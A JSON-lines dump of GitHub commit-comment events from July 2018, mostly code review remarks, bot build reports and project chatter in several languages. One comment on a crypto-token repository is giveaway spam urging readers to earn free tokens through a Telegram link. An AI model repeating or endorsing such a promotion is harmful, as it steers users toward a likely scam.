{"id":"8012397408","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"night1ightning/ruby_course"},"payload":{"comment":{"id":29819176,"position":15,"line":15,"path":"listen1/calculate_area_triangle.rb","commit_id":"a871f0dade63fab50a4d7e6475a52cebbffb35c3","created_at":"2018-07-24T19:52:08Z","updated_at":"2018-07-24T19:52:08Z","author_association":"NONE","body":"рекомендуется давать переменным \"говорящие\" имена, чтобы впоследствии было проще читать и понимать код\r\n\r\nк примеру данные переменные можно было бы назвать `base` и `height`\r\n\r\n"}},"created_at":"2018-07-24T19:52:08Z"}
{"id":"8012399846","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"night1ightning/ruby_course"},"payload":{"comment":{"id":29819180,"position":4,"line":4,"path":"listen1/calculate_area_triangle.rb","commit_id":"a871f0dade63fab50a4d7e6475a52cebbffb35c3","created_at":"2018-07-24T19:52:38Z","updated_at":"2018-07-24T19:52:38Z","author_association":"NONE","body":"приведение полученного значения к числу лучше делать в момент получения, а не в момент использования\r\n"}},"created_at":"2018-07-24T19:52:38Z"}
{"id":"8012401183","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"night1ightning/ruby_course"},"payload":{"comment":{"id":29819182,"position":4,"line":4,"path":"listen1/calculate_area_triangle.rb","commit_id":"a871f0dade63fab50a4d7e6475a52cebbffb35c3","created_at":"2018-07-24T19:52:54Z","updated_at":"2018-07-24T19:52:54Z","author_association":"NONE","body":"там где используется `to_i` (или `to_f`) вызов `chomp` (`strip`) не нужен, т.к. `to_i` (или `to_f`) \"все сделает сам\"\r\n"}},"created_at":"2018-07-24T19:52:54Z"}
{"id":"8012405783","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"night1ightning/ruby_course"},"payload":{"comment":{"id":29819189,"position":4,"line":4,"path":"listen1/calculate_ideal_weith.rb","commit_id":"a871f0dade63fab50a4d7e6475a52cebbffb35c3","created_at":"2018-07-24T19:53:51Z","updated_at":"2018-07-24T19:53:51Z","author_association":"NONE","body":"опять же, приведение к числу лучше при инициализации переменой"}},"created_at":"2018-07-24T19:53:51Z"}
{"id":"8012406258","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"heaeat/pcap_test"},"payload":{"comment":{"id":29819192,"position":87,"line":128,"path":"main.cpp","commit_id":"94947272a65e6d65dc624216352851f985f96251","created_at":"2018-07-24T19:53:57Z","updated_at":"2018-07-24T19:53:57Z","author_association":"NONE","body":"pcap_next_ex의 return 값이 0, -1, -2 일경우 header->caplen 값이 제대로 된 값이 들어 감이 보장이 되지 않습니다."}},"created_at":"2018-07-24T19:53:57Z"}
{"id":"8012407977","type":"CommitCommentEvent","actor":{"login":"wc-duck"},"repo":{"name":"matricks/bam"},"payload":{"comment":{"id":29819196,"position":null,"line":null,"path":null,"commit_id":"c192a6d1900b7cdcbf521b524548db11c4c25818","created_at":"2018-07-24T19:54:21Z","updated_at":"2018-07-24T19:54:21Z","author_association":"CONTRIBUTOR","body":"This commit actually broke my workflow in 'datalibrary' as I use jobs to run unittests ( that do not output anything ) where i would run \"bam target=... config=... test\" to build and run unittests or \"bam target=... config=... test_valgrind\" etc.\r\nIs there any workarounds or any other options to have targets without output or similar?"}},"created_at":"2018-07-24T19:54:21Z"}
{"id":"8012412207","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"night1ightning/ruby_course"},"payload":{"comment":{"id":29819199,"position":8,"line":8,"path":"listen1/calculate_quadratic_equation.rb","commit_id":"a871f0dade63fab50a4d7e6475a52cebbffb35c3","created_at":"2018-07-24T19:55:12Z","updated_at":"2018-07-24T19:55:12Z","author_association":"NONE","body":"в этой формуле ошибка -  в знаменатели потерялись скобки"}},"created_at":"2018-07-24T19:55:12Z"}
{"id":"8012416483","type":"CommitCommentEvent","actor":{"login":"daniefer"},"repo":{"name":"Briexmac/netcore-workbook"},"payload":{"comment":{"id":29819210,"position":1,"line":1,"path":"SecondDayProject/SecondDayProject/Views/_ViewStart.cshtml","commit_id":"c87c6215f6f3eff42b318f2a90771b44bd601872","created_at":"2018-07-24T19:56:06Z","updated_at":"2018-07-24T19:56:06Z","author_association":"NONE","body":"If you wanted to test that your page switched between views, how could you write this logic so that you don't have to wait 2 minutes for the clock to tick to an even and then odd minute?"}},"created_at":"2018-07-24T19:56:06Z"}
{"id":"8012418429","type":"CommitCommentEvent","actor":{"login":"sergeyk"},"repo":{"name":"wandb/client"},"payload":{"comment":{"id":29819212,"position":37,"line":50,"path":"wandb/util.py","commit_id":"1156407150b7fdf920405819b6aca06a462010b5","created_at":"2018-07-24T19:56:29Z","updated_at":"2018-07-24T19:56:29Z","author_association":"NONE","body":"Lol. I came to the repo aiming to make a similar change, because my setup lacks pandas so wandb was failing. Except I was just going to add:\r\n```\r\ntry:\r\n    from pandas import DataFrame\r\nexcept ImportError:\r\n    class DataFrame(object):\r\n        pass\r\n```"}},"created_at":"2018-07-24T19:56:29Z"}
{"id":"8012420587","type":"CommitCommentEvent","actor":{"login":"sergeyk"},"repo":{"name":"wandb/client"},"payload":{"comment":{"id":29819220,"position":37,"line":50,"path":"wandb/util.py","commit_id":"1156407150b7fdf920405819b6aca06a462010b5","created_at":"2018-07-24T19:56:56Z","updated_at":"2018-07-24T19:56:56Z","author_association":"NONE","body":"@vanpelt you guys just commit to master though? "}},"created_at":"2018-07-24T19:56:56Z"}
{"id":"8012421140","type":"CommitCommentEvent","actor":{"login":"daniefer"},"repo":{"name":"SergAgui/netcore-workbook"},"payload":{"comment":{"id":29819222,"position":3,"line":2,"path":"AnotherApp/AnotherApp/Views/_ViewStart.cshtml","commit_id":"06bdc1a0022074eee2df7e199a346641a4d7a1ef","created_at":"2018-07-24T19:57:04Z","updated_at":"2018-07-24T19:57:04Z","author_association":"NONE","body":"If you wanted to test that your page switched between views, how could you write this logic so that you don't have to wait 2 minutes for the clock to tick to an even and then odd minute?"}},"created_at":"2018-07-24T19:57:04Z"}
{"id":"8012421861","type":"CommitCommentEvent","actor":{"login":"danielbwatson"},"repo":{"name":"Netflix/aegisthus"},"payload":{"comment":{"id":29819223,"position":null,"line":null,"path":null,"commit_id":"cea5ecef79c843db7b4f03a0b1ac07f69933477c","created_at":"2018-07-24T19:57:13Z","updated_at":"2018-07-24T19:57:13Z","author_association":"CONTRIBUTOR","body":"Hi @kavink we are starting to roll out the Spark job that replaces Aegisthus internally.  We do still plan to release the code but it won't be before we have migrated all jobs off of Aegisthus. "}},"created_at":"2018-07-24T19:57:13Z"}
{"id":"8012422631","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"night1ightning/ruby_course"},"payload":{"comment":{"id":29819226,"position":33,"line":33,"path":"listen1/calculate_quadratic_equation.rb","commit_id":"a871f0dade63fab50a4d7e6475a52cebbffb35c3","created_at":"2018-07-24T19:57:22Z","updated_at":"2018-07-24T19:57:22Z","author_association":"NONE","body":"лучше вариант \"дискриминант равен 0\" вынести отдельной ветвью, т.к. в этом случае не нужно считать корень квадратный, корень уравнения только один и формула рассчета корня уравнения заметно проще"}},"created_at":"2018-07-24T19:57:22Z"}
{"id":"8012422861","type":"CommitCommentEvent","actor":{"login":"greatquux"},"repo":{"name":"greatquux/phockup"},"payload":{"comment":{"id":29819230,"position":null,"line":null,"path":null,"commit_id":"51ff59b8830778a5b15781de42ab419fd866cf8c","created_at":"2018-07-24T19:57:25Z","updated_at":"2018-07-24T19:57:25Z","author_association":"OWNER","body":"also worked around instances where EXIF data would return what looked like a date but which didn't actually parse to a date"}},"created_at":"2018-07-24T19:57:25Z"}
{"id":"8012423831","type":"CommitCommentEvent","actor":{"login":"daniefer"},"repo":{"name":"pbslavin/WebApplication2"},"payload":{"comment":{"id":29819232,"position":2,"line":2,"path":"WebApplication2/Views/_ViewStart.cshtml","commit_id":"fd8cd0d37bfabe741eea4eabd177537f5f3634bd","created_at":"2018-07-24T19:57:36Z","updated_at":"2018-07-24T19:57:36Z","author_association":"NONE","body":"If you wanted to test that your page switched between views, how could you write this logic so that you don't have to wait 2 minutes for the clock to tick to an even and then odd minute?"}},"created_at":"2018-07-24T19:57:36Z"}
{"id":"8012428888","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"night1ightning/ruby_course"},"payload":{"comment":{"id":29819241,"position":35,"line":35,"path":"listen1/calculate_quadratic_equation.rb","commit_id":"a871f0dade63fab50a4d7e6475a52cebbffb35c3","created_at":"2018-07-24T19:58:34Z","updated_at":"2018-07-24T19:58:34Z","author_association":"NONE","body":"лучше рассчеты провесит отдельно, присвоить в переменные, а уже переменные передать методу аутпута\r\nжелательно разделять логику, рассчеты и аутпут в своем коде"}},"created_at":"2018-07-24T19:58:34Z"}
{"id":"8012429070","type":"CommitCommentEvent","actor":{"login":"dcao"},"repo":{"name":"dcao/elba"},"payload":{"comment":{"id":29819242,"position":178,"line":225,"path":"src/lib/retrieve/cache.rs","commit_id":"a885a649db2a7fe58d370001f90c7ba199592d89","created_at":"2018-07-24T19:58:36Z","updated_at":"2018-07-24T19:58:36Z","author_association":"OWNER","body":"`copy` isn't `std::fs::copy`; it's the `copy` function from util, which uses walkdir to go through every file in a directory and copies them to another directory."}},"created_at":"2018-07-24T19:58:36Z"}
{"id":"8012429420","type":"CommitCommentEvent","actor":{"login":"daniefer"},"repo":{"name":"DylanZocchi/netcore-workbook"},"payload":{"comment":{"id":29819243,"position":1,"line":1,"path":"Day2/Day2/Views/_ViewStart.cshtml","commit_id":"ff93924b6cd36990dde69c0f58f0a2ee86b3f0a6","created_at":"2018-07-24T19:58:41Z","updated_at":"2018-07-24T19:58:41Z","author_association":"NONE","body":"If you wanted to test that your page switched between views, how could you write this logic so that you don't have to wait 2 minutes for the clock to tick to an even and then odd minute?"}},"created_at":"2018-07-24T19:58:41Z"}
{"id":"8012431692","type":"CommitCommentEvent","actor":{"login":"willismonroe"},"repo":{"name":"adeloucas/cltk"},"payload":{"comment":{"id":29819249,"position":93,"line":102,"path":"docs/akkadian.rst","commit_id":"db621d1cce2b481b5d581a05b0b7bceb2b55ac52","created_at":"2018-07-24T19:59:09Z","updated_at":"2018-07-24T19:59:09Z","author_association":"NONE","body":"Both 'metadata' and 'transliteration' are nested lists with only one element.  Is there any reason to keep them as nested lists?  See if you can reduce them to just a single list each."}},"created_at":"2018-07-24T19:59:09Z"}
{"id":"8012435999","type":"CommitCommentEvent","actor":{"login":"jkuebart"},"repo":{"name":"mqnc/c-sick"},"payload":{"comment":{"id":29819259,"position":15,"line":56,"path":"src/main.cpp","commit_id":"b773d663d3f95604790885cb691b2c603685fb3b","created_at":"2018-07-24T19:59:59Z","updated_at":"2018-07-24T19:59:59Z","author_association":"COLLABORATOR","body":"usually we say: ```cout << \"usage: \" << args[0] << \" parser.lua file\" << endl\r\n    << \"\\tRead the grammar and reduction rules from parser.lua and\" << endl\r\n    << \"\\tparse the given file.\" << endl;```"}},"created_at":"2018-07-24T19:59:59Z"}
{"id":"8007366933","type":"CommitCommentEvent","actor":{"login":"jeromesunt"},"repo":{"name":"Azure/sonic-swss-common"},"payload":{"comment":{"id":29808080,"position":127,"line":113,"path":"common/select.cpp","commit_id":"1ef337a96df371162686b825964ed76bc68325c9","created_at":"2018-07-24T02:01:15Z","updated_at":"2018-07-24T02:01:15Z","author_association":"NONE","body":"Does this if block want to update updateLastUsedTime in all seletables that have data and are read in the for block above?\r\n\r\nHere only update the first item in set m_ready."}},"created_at":"2018-07-24T02:01:15Z"}
{"id":"8007368254","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29808081,"position":null,"line":null,"path":null,"commit_id":"ef701172f701223fb264a2ab4dfc5bf258e2ef81","created_at":"2018-07-24T02:01:45Z","updated_at":"2018-07-24T02:01:45Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-fpg-filt](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-fpg-filt).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-fpg-filt-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-24T02:01:45Z"}
{"id":"8007369880","type":"CommitCommentEvent","actor":{"login":"rpherbig"},"repo":{"name":"rpherbig/dr-scripts"},"payload":{"comment":{"id":29808085,"position":4,"line":16,"path":"gpouch.lic","commit_id":"e0e7e9ffd97e11d3acf3cd7045e027afdd7181ae","created_at":"2018-07-24T02:02:19Z","updated_at":"2018-07-24T02:02:19Z","author_association":"OWNER","body":"I fixed the comma but not the `\\s`"}},"created_at":"2018-07-24T02:02:19Z"}
{"id":"8007374867","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29808091,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-24T02:04:10Z","updated_at":"2018-07-24T02:04:10Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-24T02:04:10Z"}
{"id":"8007375651","type":"CommitCommentEvent","actor":{"login":"herronjo"},"repo":{"name":"STiBaRC/stibarc_web"},"payload":{"comment":{"id":29808094,"position":null,"line":null,"path":null,"commit_id":"18d3e890bb64a2865c5f26b1bcab0ee46ee0ce7b","created_at":"2018-07-24T02:04:27Z","updated_at":"2018-07-24T02:04:27Z","author_association":"MEMBER","body":"Seems fine to me. "}},"created_at":"2018-07-24T02:04:27Z"}
{"id":"8007380087","type":"CommitCommentEvent","actor":{"login":"Xinzhu-Fang"},"repo":{"name":"Xinzhu-Fang/NDTr"},"payload":{"comment":{"id":29808098,"position":null,"line":null,"path":null,"commit_id":"52452298503d90987f421b3c4fb4c677d96db3cc","created_at":"2018-07-24T02:06:01Z","updated_at":"2018-07-24T02:06:01Z","author_association":"OWNER","body":"also, started writing error messages with validate"}},"created_at":"2018-07-24T02:06:01Z"}
{"id":"8007384244","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29808103,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-24T02:07:32Z","updated_at":"2018-07-24T02:07:32Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-24T02:07:32Z"}
{"id":"8007384254","type":"CommitCommentEvent","actor":{"login":"rocsilva"},"repo":{"name":"rocsilva/eejvm-app"},"payload":{"comment":{"id":29808104,"position":null,"line":null,"path":null,"commit_id":"7c8cdc8c1a60e8d6876e4956cfc0645fe8ff8ddb","created_at":"2018-07-24T02:07:32Z","updated_at":"2018-07-24T02:07:32Z","author_association":"OWNER","body":"Ajuste no ícone do Toggle Sidebar."}},"created_at":"2018-07-24T02:07:32Z"}
{"id":"8007384501","type":"CommitCommentEvent","actor":{"login":"hoanguyen1968"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29808105,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T02:07:38Z","updated_at":"2018-07-24T02:07:38Z","author_association":"NONE","body":"A great project"}},"created_at":"2018-07-24T02:07:38Z"}
{"id":"8007384794","type":"CommitCommentEvent","actor":{"login":"liam-b"},"repo":{"name":"liam-b/computer-blocks-refactor"},"payload":{"comment":{"id":29808107,"position":null,"line":null,"path":null,"commit_id":"0983e056f4f8b3508abdde0405c0557fcf1ce17e","created_at":"2018-07-24T02:07:45Z","updated_at":"2018-07-24T02:07:45Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Add block and grid basic drawing](https://trello.com/c/FAo0TDX3/2-add-block-and-grid-basic-drawing)"}},"created_at":"2018-07-24T02:07:45Z"}
{"id":"8007388102","type":"CommitCommentEvent","actor":{"login":"hoanguyen1968"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29808111,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T02:08:58Z","updated_at":"2018-07-24T02:08:58Z","author_association":"NONE","body":"To the moon"}},"created_at":"2018-07-24T02:08:58Z"}
{"id":"8007390180","type":"CommitCommentEvent","actor":{"login":"goIncognito"},"repo":{"name":"goIncognito/Repo1"},"payload":{"comment":{"id":29808114,"position":null,"line":null,"path":null,"commit_id":"36b522858192190d9fb72a1358cb4bd40ad0a6d9","created_at":"2018-07-24T02:09:48Z","updated_at":"2018-07-24T02:09:48Z","author_association":"OWNER","body":"[udemy-dl-master.zip](https://github.com/goIncognito/Repo1/files/2221670/udemy-dl-master.zip)\r\n"}},"created_at":"2018-07-24T02:09:48Z"}
{"id":"8007392821","type":"CommitCommentEvent","actor":{"login":"dulmandakh"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29808119,"position":null,"line":null,"path":null,"commit_id":"6da5779eb74edace6f741f54f8c85f05fbefe0b8","created_at":"2018-07-24T02:10:50Z","updated_at":"2018-07-24T02:10:50Z","author_association":"COLLABORATOR","body":"@hramos Android CI is failing"}},"created_at":"2018-07-24T02:10:50Z"}
{"id":"8007398407","type":"CommitCommentEvent","actor":{"login":"FLESXSierra"},"repo":{"name":"alegori/Firstproject"},"payload":{"comment":{"id":29808126,"position":12,"line":12,"path":"EmployeePayment/src/Payment.java","commit_id":"8eb4490be18b279246f570318cfde5b95e6a6673","created_at":"2018-07-24T02:12:55Z","updated_at":"2018-07-24T02:12:55Z","author_association":"NONE","body":"Jajajajaja"}},"created_at":"2018-07-24T02:12:55Z"}
{"id":"8007398970","type":"CommitCommentEvent","actor":{"login":"parwindraa"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29808128,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T02:13:09Z","updated_at":"2018-07-24T02:13:09Z","author_association":"NONE","body":"good"}},"created_at":"2018-07-24T02:13:09Z"}
{"id":"8007401761","type":"CommitCommentEvent","actor":{"login":"ohenrik360"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29808136,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T02:14:12Z","updated_at":"2018-07-24T02:14:12Z","author_association":"NONE","body":"📣📣📣 Earn 500token  ‍💪 ‍💪\nJoin now 👍 👍\n🎁      t.me/coinfree247  🎁\n\n2018-07-24 9:09 GMT+07:00 hoanguyen1968 <notifications@github.com>:\n\n> To the moon\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/iride2020/iRide-Token/commit/8f810b3700a24de0ee4f945ef84be7b2f1605610#commitcomment-29808111>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AnqiZMf3OoUzoEKuvt_6zk7qxuy9yGnGks5uJoHQgaJpZM4VaEAl>\n> .\n>\n"}},"created_at":"2018-07-24T02:14:12Z"}
{"id":"8007403817","type":"CommitCommentEvent","actor":{"login":"Mrnibblesg"},"repo":{"name":"Mrnibblesg/Multi-Platformer"},"payload":{"comment":{"id":29808137,"position":null,"line":null,"path":null,"commit_id":"70967d17ed024f149668bc63d40f8127ad2e6502","created_at":"2018-07-24T02:15:01Z","updated_at":"2018-07-24T02:15:01Z","author_association":"OWNER","body":"Also fixed bug where signing in would make some events trigger twice when called"}},"created_at":"2018-07-24T02:15:01Z"}
{"id":"8007406579","type":"CommitCommentEvent","actor":{"login":"gak45"},"repo":{"name":"nemosminer/NemosMiner"},"payload":{"comment":{"id":29808141,"position":null,"line":null,"path":null,"commit_id":"f2525ce958afcdc5357ddf93fa8ce8b1b012321c","created_at":"2018-07-24T02:16:01Z","updated_at":"2018-07-24T02:16:01Z","author_association":"NONE","body":"Why was this deleted? It looks like an interesting take on improving the plus pool option."}},"created_at":"2018-07-24T02:16:01Z"}
{"id":"8007407416","type":"CommitCommentEvent","actor":{"login":"lgeistlinger"},"repo":{"name":"Bioconductor/BiocWorkshops"},"payload":{"comment":{"id":29808142,"position":null,"line":null,"path":null,"commit_id":"dccfecc0f4cfe5d65e2fb900b430e0c6ff332424","created_at":"2018-07-24T02:16:17Z","updated_at":"2018-07-24T02:16:17Z","author_association":"COLLABORATOR","body":"Great thanks for fixing the structure @lwaldron !"}},"created_at":"2018-07-24T02:16:17Z"}
{"id":"8007408668","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29808143,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-24T02:16:42Z","updated_at":"2018-07-24T02:16:42Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-24T02:16:42Z"}
{"id":"8007416193","type":"CommitCommentEvent","actor":{"login":"gracegeddes"},"repo":{"name":"gracegeddes/IknowSomewhere"},"payload":{"comment":{"id":29808149,"position":null,"line":null,"path":null,"commit_id":"583926f579e113c23d14ee124fd0944bed0fe468","created_at":"2018-07-24T02:19:22Z","updated_at":"2018-07-24T02:19:22Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [javascript filter functions](https://trello.com/c/H4GCsPts/5-javascript-filter-functions)"}},"created_at":"2018-07-24T02:19:22Z"}
{"id":"8007416314","type":"CommitCommentEvent","actor":{"login":"KentJames"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29808150,"position":80,"line":588,"path":"epic_bf_dev/EPIC_bifrost.py","commit_id":"e7252a0697a584f1c8795371b636a21d2afc15d9","created_at":"2018-07-24T02:19:24Z","updated_at":"2018-07-24T02:19:24Z","author_association":"COLLABORATOR","body":"I don't know why the JIT compiler keeps crashing because of the types. I was wondering if this was some idiosyncracy you have experienced? Essentially it complains that it sees a type of Complex<float, void> which doesn't match any of the standard library polymorphic functions. I don't even know what Complex<float, void> but apparantely the cast works, not sure if its slows things down.\r\n\r\nI am also pretty sure I can combine the maps together by just writing normal C++ in it. "}},"created_at":"2018-07-24T02:19:24Z"}
{"id":"8007418541","type":"CommitCommentEvent","actor":{"login":"alexdanielson"},"repo":{"name":"alexdanielson/github_101"},"payload":{"comment":{"id":29808153,"position":null,"line":null,"path":null,"commit_id":"c400fba54a23e1627be06caaf455494eeaee922a","created_at":"2018-07-24T02:20:12Z","updated_at":"2018-07-24T02:20:12Z","author_association":"OWNER","body":"File forked and edited to include the assignment answers"}},"created_at":"2018-07-24T02:20:12Z"}
{"id":"8007421053","type":"CommitCommentEvent","actor":{"login":"Constellation"},"repo":{"name":"Igalia/webkit"},"payload":{"comment":{"id":29808158,"position":1,"line":3017,"path":"Source/JavaScriptCore/bytecompiler/BytecodeGenerator.cpp","commit_id":"3f94d2f1395f97cf914febbf21d7d81068bd6826","created_at":"2018-07-24T02:21:10Z","updated_at":"2018-07-24T02:21:10Z","author_association":"NONE","body":"You need to add `m_codeBlock->addPropertyAccessInstruction(...)` and add marking / clearing code in `CodeBlock`."}},"created_at":"2018-07-24T02:21:10Z"}
{"id":"8007422501","type":"CommitCommentEvent","actor":{"login":"pekerleke"},"repo":{"name":"Un-Aventon/un-aventon-web"},"payload":{"comment":{"id":29808160,"position":null,"line":null,"path":null,"commit_id":"aa60b5989dc9b3f9cca860c32a15536a18b79c8e","created_at":"2018-07-24T02:21:42Z","updated_at":"2018-07-24T02:21:42Z","author_association":"CONTRIBUTOR","body":"Yo tengo la tarjeta 7777 7777 7777 7776 cómo puedo hacer?"}},"created_at":"2018-07-24T02:21:42Z"}
{"id":"8007422760","type":"CommitCommentEvent","actor":{"login":"Constellation"},"repo":{"name":"Igalia/webkit"},"payload":{"comment":{"id":29808161,"position":9,"line":3025,"path":"Source/JavaScriptCore/bytecompiler/BytecodeGenerator.cpp","commit_id":"3f94d2f1395f97cf914febbf21d7d81068bd6826","created_at":"2018-07-24T02:21:49Z","updated_at":"2018-07-24T02:21:49Z","author_association":"NONE","body":"Ditto"}},"created_at":"2018-07-24T02:21:49Z"}
{"id":"8007424201","type":"CommitCommentEvent","actor":{"login":"jeromesunt"},"repo":{"name":"Azure/sonic-swss-common"},"payload":{"comment":{"id":29808163,"position":119,"line":107,"path":"common/select.cpp","commit_id":"1ef337a96df371162686b825964ed76bc68325c9","created_at":"2018-07-24T02:22:22Z","updated_at":"2018-07-24T02:22:22Z","author_association":"NONE","body":"It seems like epoll do not sort events by fd. How to guarantee we can handle events of high priority seletable first?"}},"created_at":"2018-07-24T02:22:22Z"}
{"id":"8007426437","type":"CommitCommentEvent","actor":{"login":"angucho9"},"repo":{"name":"FelCer/FotoMulta"},"payload":{"comment":{"id":29808165,"position":1,"line":1,"path":"README.md","commit_id":"4de9b4ecd7b19b3f451d8bf540485345a1a9a0e7","created_at":"2018-07-24T02:23:17Z","updated_at":"2018-07-24T02:23:17Z","author_association":"COLLABORATOR","body":"DenunciApp"}},"created_at":"2018-07-24T02:23:17Z"}
{"id":"8007443239","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29808195,"position":null,"line":null,"path":null,"commit_id":"832c04c5b5f83ba77d1077bcef1cfc2241f2ed39","created_at":"2018-07-24T02:29:32Z","updated_at":"2018-07-24T02:29:32Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2324 of 2324 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-832c04c5b5f83ba77d1077bcef1cfc2241f2ed39-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-832c04c5b5f83ba77d1077bcef1cfc2241f2ed39-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-832c04c5b5f83ba77d1077bcef1cfc2241f2ed39-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-24T02:29:32Z"}
{"id":"8007443619","type":"CommitCommentEvent","actor":{"login":"storm119"},"repo":{"name":"storm119/android_frameworks_base"},"payload":{"comment":{"id":29808196,"position":null,"line":null,"path":null,"commit_id":"fbdc8deeeff133351711568ea058bc63ea319980","created_at":"2018-07-24T02:29:42Z","updated_at":"2018-07-24T02:29:42Z","author_association":"OWNER","body":"I'm very sorry to both of you @Mazda-- and @varund7726 ...my promise I won't let this thing happen again in future...just to let you know...this repo meant to be as my private build and didn't expect anyone will cherry picking what I did...\r\n\r\nMy apologise..."}},"created_at":"2018-07-24T02:29:42Z"}
{"id":"8007443862","type":"CommitCommentEvent","actor":{"login":"nywilken"},"repo":{"name":"exercism/cli"},"payload":{"comment":{"id":29808197,"position":39,"line":88,"path":"workspace/solution.go","commit_id":"c363a1f1fd50bf99820de9eea6696e89326a4021","created_at":"2018-07-24T02:29:47Z","updated_at":"2018-07-24T02:29:47Z","author_association":"CONTRIBUTOR","body":"I like what you did here. It simplifies the path to the solution file and cleans up a bit of redundancy. Nicely done.\r\n\r\n @kytrinyx you mentioned doing this as well so I thought I would call it out. "}},"created_at":"2018-07-24T02:29:47Z"}
{"id":"8007446501","type":"CommitCommentEvent","actor":{"login":"McAfeeAdminInstance2"},"repo":{"name":"McAfeeInst2Org1/newrepo"},"payload":{"comment":{"id":29808204,"position":1,"line":null,"path":"1532399439.54/github_test.txt","commit_id":"9ef959599fa8d2df2c0ed68a8390715985b88a29","created_at":"2018-07-24T02:30:41Z","updated_at":"2018-07-24T02:30:41Z","author_association":"CONTRIBUTOR","body":"889976543"}},"created_at":"2018-07-24T02:30:41Z"}
{"id":"8007447297","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29808205,"position":null,"line":null,"path":null,"commit_id":"832c04c5b5f83ba77d1077bcef1cfc2241f2ed39","created_at":"2018-07-24T02:30:59Z","updated_at":"2018-07-24T02:30:59Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-832c04c5b5f83ba77d1077bcef1cfc2241f2ed39-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-24T02:30:59Z"}
{"id":"8007447496","type":"CommitCommentEvent","actor":{"login":"opoplawski"},"repo":{"name":"gnudatalanguage/gdl"},"payload":{"comment":{"id":29808208,"position":null,"line":null,"path":null,"commit_id":"3a0d733849fe0cf63e27a070c0897538eb7dca81","created_at":"2018-07-24T02:31:03Z","updated_at":"2018-07-24T02:31:03Z","author_association":"CONTRIBUTOR","body":"Fedora uses a libgeotiff sub-dir."}},"created_at":"2018-07-24T02:31:03Z"}
